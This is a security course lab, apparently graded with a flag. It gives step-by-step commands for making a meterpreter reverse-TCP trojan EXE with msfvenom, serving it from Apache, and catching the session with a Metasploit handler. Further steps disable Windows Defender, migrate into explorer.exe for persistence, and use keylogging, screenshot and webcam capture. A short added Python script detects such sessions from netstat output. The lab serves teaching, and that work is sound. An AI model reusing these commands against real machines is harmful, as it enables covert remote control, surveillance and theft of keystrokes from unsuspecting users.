H 320: Creating a Trojan with Metasploit (15 pts)

What You Need

Purpose

We will use Metasploit to create an infectious EXE file.

A user who runs that file surrenders control of their computer.

Task 1: Configuring Networking

Finding Your Linux Server's IP Address

You need to find the IP address that allows your Windows system to reach your Linux server.

The exact commands required vary for different cyber range setups, as detailed in previous projects.

Ping Test

On your Windows machine, in a Command Prompt, execute this command to ping your Linux server, replacing the IP address with the correct address of your Linux server:
ping 192.168.100.1
You should see replies, as shown below:

Installing Apache

On your Linux server, execute these commands:
sudo apt update
sudo apt install apache2 -y
sudo ss -lnt
You should see a listening process on port 80, as shown below:

Testing the Connection to Port 80

On your Windows machine, in a Web browser, enter this address, replacing the address with the address of your Linux server:
http://192.168.100.1
You should see a Web page, as shown below:

Installing Npcap

Since April of 2019, the Windows installer for Nmap has been broken. The workaround is to install Npcap first, to get the latest version.

On your Windows machine, in a Web browser, enter this address:

https://nmap.org/npcap/#download
Download and install the latest Windows version, as shown below.

Starting a socat Forwarder on Port 4444

On your Linux server, execute these commands:
sudo apt install socat -y
socat TCP-LISTEN:4444,fork TCP:127.0.0.1:80
The terminal waits for a connection, as shown below:

Testing the Connection to Port 4444

On your Windows machine, in a Web browser, enter this address, replacing the address with the address of your Linux server:
http://192.168.100.1:4444
You should see a Web page, as shown below:

Once the test succeeds, on your Linux system, press Ctrl+C to stop socat.

Disabling Windows Defender

On your Windows system, click Start and type DEF

Launch "Windows Defender".

At the top right, click Settings.

Turn off "Real-time protection", as shown below:

Task 2: Creating Malware

Installing Metasploit

If you don't already have Metasploit installed on your Linux server, execute these commands:
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
sudo ./msfinstall

Using Msfvenom to Make a Malicious EXE

On your Linux server, execute these commands to create a malicious Windows executable file named "fun.exe" and serve it from your Apache Web server.

Adjust the IP address to match the IP address of your Linux machine (the C&C server).

sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.1 -f exe -o /var/www/html/fun.exe
sudo service apache2 start
The operation proceeds without errors, as shown below.

Launching Msfconsole

On your Linux server, execute these commands, one at a time, to start a Metasploit listener:
sudo msfconsole -q
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
exploit
Metasploit starts a "reverse TCP handler", as shown below.

Running the Malware on the Target Machine

On the target Windows machine, open a Web browser and open this URL, replacing the IP address with the IP address of your Linux machine:
http://192.168.100.1/fun.exe
Download the "fun.exe" file. Bypass any warning boxes, double-click the file, and allow it to run.

Note: if you are using antivirus, you will need to disable it. You will also need to disable Windows Defender. If you have problems disabling your malware protection, use the Windows 2008 Server virtual machine, which has no malware protection.

On your Linux machine, a meterpreter session opens, as shown below.

Using The Meterpreter Shell

On your Linux machine, at the meterpreter > prompt, execute this command:
help
Several pages of help scroll by. Several interesting commands are available, as shown below.

Migrating to a Different Process

The Metasploit shell is running inside the "fun.exe" process. If the user closes that process, or logs off, the connection will be lost.

To become more persistent, we'll migrate to a process that will last longer.

To see a list of processes, at the meterpreter > prompt, execute this command:

ps
Let's migrate to the explorer process.

At the meterpreter > prompt, execute this command:

migrate -N explorer.exe
Migration is unreliable: it may succeed, or it may time out. If it times out, take the steps shown in the image below. After that, the migration should succeed, as shown below.

If you can't get it to work after a few tries, skip it and proceed to the next section.

Post-Exploitation

You now own the target! Here are some fun meterpreter commands to try:

screenshot       Gives you an image of the target's desktop
keyscan_start    Begins capturing keys typed in the target. On the Windows target, open Notepad and type in some text, such as your name.
keyscan_dump     Shows the keystrokes captured so far
webcam_list      Shows the available webcams (if any)
webcam_snap      Takes a photo with the webcam
shell            Gives you a Windows Command Prompt on the target
exit             Leaves the Windows Command Prompt

Viewing System Information

On your Linux machine, at the meterpreter > prompt, execute this command:
sysinfo
A list of network connections appears, including one to a remote port of 4444, as highlighted in the image below.

Notice the "Meterpreter" name for this connection, which is redacted in the image below.
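From the defender's side, the session this lab creates leaves two visible traces on the Windows machine: an established connection to the handler port (4444 here) and, after migration, network activity from explorer.exe, which normally makes no outbound connections. The following Python script is an added example, not part of the original lab: it parses netstat -ano style output and flags both signs. The netstat text and the PID-to-process table (standing in for tasklist output) are constructed sample data, and the 4444 handler port and the "no-network" process list are assumptions you would adjust for your environment.

```python
"""Flag reverse-shell-style connections in Windows 'netstat -ano' output."""
from collections import namedtuple

# 4444 is the handler port this lab uses; extend the set for your environment.
SUSPECT_PORTS = {4444}
# Processes that should not hold outbound TCP sessions; a session migrated into
# explorer.exe, as in this lab, shows up as network activity from that process.
NO_NETWORK_PROCESSES = {"explorer.exe", "notepad.exe"}

Conn = namedtuple("Conn", "proto local remote state pid")

def parse_netstat(text):
    """Parse the TCP rows of 'netstat -ano' output; header and UDP rows are skipped."""
    conns = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 5 and parts[0] == "TCP":
            conns.append(Conn(parts[0], parts[1], parts[2], parts[3], int(parts[4])))
    return conns

def remote_port(addr):
    # rsplit on the last colon handles IPv6 literals such as [::1]:4444 too.
    return int(addr.rsplit(":", 1)[1])

def flag_suspicious(conns, pid_names):
    """Return (pid, process, remote, reason) for established sessions worth a look."""
    findings = []
    for c in conns:
        if c.state != "ESTABLISHED":
            continue
        name = pid_names.get(c.pid, "unknown")
        reasons = []
        if remote_port(c.remote) in SUSPECT_PORTS:
            reasons.append("remote port %d is a known handler port" % remote_port(c.remote))
        if name.lower() in NO_NETWORK_PROCESSES:
            reasons.append("%s does not normally make outbound connections" % name)
        if reasons:
            findings.append((c.pid, name, c.remote, "; ".join(reasons)))
    return findings

# Constructed sample data (not a real capture): a victim at 192.168.100.50 with a
# meterpreter session migrated into explorer.exe (PID 2840); server is 192.168.100.1.
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    192.168.100.50:49712   192.168.100.1:4444     ESTABLISHED     2840
  TCP    192.168.100.50:49720   192.168.100.1:80       TIME_WAIT       0
  TCP    192.168.100.50:49731   203.0.113.10:443       ESTABLISHED     3104
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       912
"""
SAMPLE_TASKLIST = {2840: "explorer.exe", 3104: "msedge.exe", 912: "svchost.exe"}
```

Run flag_suspicious(parse_netstat(SAMPLE_NETSTAT), SAMPLE_TASKLIST) and only the explorer.exe session to port 4444 is reported; the browser session on 443 and the non-established rows are ignored.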


H 320.1: "Meterpreter" name (15 pts)

The flag is the "Meterpreter" name, which is redacted in the image above.
Moved to local server 3-21-19
Form removed 7-9-19
Updated with network tests 6-8-2020
pre added to commands 8-2-20
pre added to socat line 8-4-2020